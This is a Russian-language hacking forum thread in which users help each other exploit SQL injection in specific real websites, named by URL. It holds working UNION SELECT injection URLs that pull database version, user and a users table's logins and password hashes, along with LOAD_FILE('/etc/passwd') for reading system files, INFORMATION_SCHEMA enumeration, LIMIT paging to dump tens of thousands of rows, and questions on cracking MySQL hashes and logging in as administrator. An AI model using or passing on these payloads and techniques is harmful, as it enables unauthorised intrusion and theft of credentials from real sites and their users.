подскажите пожлста уязвим ли первый параметр? http://events.umn.edu/event?occurrence=408233;event=120318
Подскажите LOAD_FILE('/etc/passwd') так и указывать? /etc/passwd? или надо полный путь найти если да то как?
путь относительно корня (прлный). Если тебе нужно прочитать скрипт, то ищи раскрытие путей через выведенные ошибки или подбором (на практике, никогда не получалось)
Хотел узнать есть шелл на нем я нашел файлик .htpasswd открыл его там имеет запись виде: Я так понял это акки, но для чего??? И в каком виде зашифрованы пароли???
Вот обьясните мне, ну вот нашел я уязвимость в скрипте вот http://www.build.kz/index.php?page=inc/cut§or=comp&action=sublist&cid=-1+union+select+concat(user(),char(58),version(),ch ar(58),database()),2+/* А как мне имена таблиц то и столбцов подобрать??? версия скулы то 4 чем пользоваться? или есть базы? поделитесь пжлст)))
Вот тут список дефолтовских таблиц и полей: http://forum.antichat.ru/showpost.php?p=465677&postcount=3 подбирай
2 truelamer Ручками, то есть - ручной брутфорс, а вообще - там есть табла users - тебе осталось только колонки подобрать
Спасибо вот что я нашел http://www.build.kz/index.php?page=inc/cut§or=comp&action=sublist&cid=-1+union+select+concat(users_name,char(58),users_password),2+from+users%20limit+0,1/* только проблема обьясните там что хэш пароля не до конца вылез или как? и почему то лимитом листать не получается что только один пользователь?
Спасибо!!!!! блин жаль я тебе hgenfwbb мало первый раз добавил))) А что меня не хотит пускать под login: Administrator pass:admin что такое? Да и срузу же паралельно вопросик чем расшифровать MySQL хэш
Есть sql инъекция, столкнулся с такой проблемой: функцией count() через sql запрос показывает, что в таблице 30789 записей, когда даю запрос "limit+50,1" запрос выполняется и выводит 50-ую строку, но когда вбиваю "limit+100,1" то данные не выводятся. Плюс ко всему запрос работает и так "limit+1,5000" и выдаёт мне 5000 строк из таблицы, а когда запрашиваю "limit+1,9000" то не выводит ничего, просто пустую (белую) страницу выдаёт. В чём суть проблемы и возможно ли вывести все ~30к?
покажи на примере. вообще не выводятся? есть ли возможность что те значения пустые? то что не выводит 9к записей - скорее всего просто или у пхп память кончается (memory limit exceed) ну или чтониб подобное с нехваткой ресурсов, что тебе мешает сделать несколько запросов limit+1,5000 limit+5000,10000 limit+10000,15000 и тд )
limit+1+offset+номер по порядку пробовал ? ИМХО- скорее всего из-за ограниченных прав И такой вопрос, имею запрос вида -1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51+from+INFORMATION_SCHEMA.COLUMNS+limit+1250/* как его можна изменить чтобы выводить не по одной строчке а вывести все сразу, limit+100,1 и limit+100,1 пробовал не наказывайте если не в этом разделе надо писать